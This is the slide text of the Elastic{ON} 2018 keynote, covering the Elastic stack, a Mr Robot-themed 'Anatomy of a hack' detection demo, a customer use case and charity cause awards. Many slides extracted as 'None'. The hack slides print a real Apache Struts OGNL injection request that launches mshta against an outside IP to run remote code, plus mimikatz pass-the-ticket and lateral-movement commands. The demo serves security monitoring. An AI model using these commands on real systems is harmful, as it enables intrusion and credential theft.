Elastic{ON} 2018 - Keynote

Transcript

1. None
2. None

3. the shape of a stack

4. None

5. think of the bytes 1TB 25MB 5MB

6. cloudy with a chance of anomaly

7. from realism to IMPRESSionism from realism to IMPRESSionism

8. from realism to IMPRESSionism

9. None
10. None

11. here, hold my coffee

12. None
13. None
14. None

15. Anatomy of a hack

16. None

17. E Corp New York 
 Paper Records Facility UPS management

    server malicious
 firmware

18. E Corp Internal Network E Corp DMZ E Corp New

    York 
 Paper Records Facility Simplified Network 
 Topology

19. E Corp DMZ

20. E Coin web server E Corp DMZ Apache Struts exploit

    GET /struts2-blank/example/HelloWorld.action?redirect: %24{(new+java.lang.ProcessBuilder(new+java.lang.String[] {'mshta',new%20java.lang.String('http:nn192.251.168.224') .replace('n','\u002f')})).start()}

21. E Corp Internal Network pivot systems

22. E Corp Internal Network { pivot systems

23. net view \\csat-fs01 mimi.exe “privilege::debug” “kerb
 eros:ptt c:\temp\tickets” exit klist

    net use y: \\csat-fs01\D$ C:\Windows\system32\ 
 net.exe C:\temp\mimi.exe 
 C:\windows\system32 
 \klist.exe C:\Windows\system32\ 
 net.exe September 29th 2015, 06:09:56.860 +00:00 September 29th 2015, 06:10:11.931 +00:00 September 29th 2015, 06:10:26.871 +00:00 September 29th 2015, 06:10:40.261 +00:00 b9a4dac2192fd78cda0 
 97bfa79f6e7b2 b8a9569a8a227f7e98e 
 b297433d405da 28656e674bfa56253 
 bc73ec81071363e b9a4dac2192fd78cda0 
 97bfa79f6e7b2 Administrator Administrator Administrator Administrator

24. 92fd78cda0 
 7b2 a227f7e98e 
 05da bfa56253 
 71363e 92fd78cda0

    
 7b2 Administrator Administrator Administrator Administrator
25. None

26. 9a4dac2192fd78cda0 
 7bfa79f6e7b2 Administrator

27. pivot systems E Corp Internal Network Code Signing Architecture Team

    (CSAT) CSAT
 corp systems CSAT lab and HSMs
 (air-gapped)
28. None

29. “If a scene needs flashy or inaccurate graphics on a

    computer in order to increase the drama or explain a plot point, there’s an issue with the writing. On Mr Robot, we work hard to ensure that the stakes of the scene and the character motivations are clear even if you have no idea how the technology works. If you do understand the technology, you have the added bonus of recognizing real vulnerabilities […] and authentic dialogue…” -Kor Adana, Writer / Producer
30. None
31. None
32. None
33. None
34. None
35. None
36. None
37. None
38. None

39. > 70,000 endpoints Risk Dashboard Response Management Corrective actions and

    validation Customer use-case: 
 Automating endpoint vulnerability management at-scale Vulnerability checks Asset data Security benchmarks

40. Anatomy of a hack

41. layers all the way down

42. a swift detour to our beginnings

43. you know, for search

44. Elasticsearch Engineer I Elasticsearch Engineer II Elastic Certified Engineer

45. sliders

46. None

47. cause awards

48. Thorn builds technology to defend children from sexual abuse. Spotlight,

    which accelerates identification of child victims of sex trafficking, helped identify 5,791 child sex trafficking victims (eight per day.)

49. Libraries Without Borders facilitates free, open access to information and

    education, equipping vulnerable communities around the world with the tools and skills to learn and to thrive. The organization is rolling out digital libraries as well as portable digital media centers providing resources to communities in need.

50. Refugee Datathon Munich provides up-to- date and reliable numbers for

    pro-refugee activists across Europe. The software helps activists stay on top of current trends in asylum (e.g. approval rates by countries of origin), while serving the general public by disproving erroneous statements and biased reports about refugees.

51. Dimagi is helping to fight the tuberculosis (TB) epidemic in

    India—which accounts for 23 percent of TB cases worldwide— with an integrated mobile and web application that helps healthcare workers keep track of TB patients.
52. None
53. None
54. None
55. None
56. None
57. None
58. None
59. None